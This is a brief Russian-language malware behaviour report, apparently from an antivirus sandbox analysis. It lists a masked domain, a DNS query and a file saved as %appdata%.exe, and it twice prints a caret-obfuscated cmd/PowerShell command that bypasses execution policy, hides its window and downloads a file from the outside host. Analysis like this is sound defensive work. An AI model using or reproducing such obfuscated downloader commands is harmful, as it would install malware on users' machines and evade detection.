Техническая информация
- http://fl###rs-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^E^rSHelL.^ExE ^-^eXEcut^i^ON^pOli^cY ^b^yp^ASS -NoPR^O^FiL^e -WiN^DowS^tYLe^ H^Id^D^E^N (^NeW-oBj^ecT S^y^STEM.nE^t.w^Eb^c^LIE^nt).^D^owN^load^fIL^e^('http://fl###rs...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "POw^E^rSHelL.^ExE ^-^eXEcut^i^ON^pOli^cY ^b^yp^ASS -NoPR^O^FiL^e -WiN^DowS^tYLe^ H^Id^D^E^N (^NeW-oBj^ecT S^y^STEM.nE^t.w^Eb^c^LIE^nt).^D^owN^load^fIL^e^('http://fl###rs...' (со скрытым окном)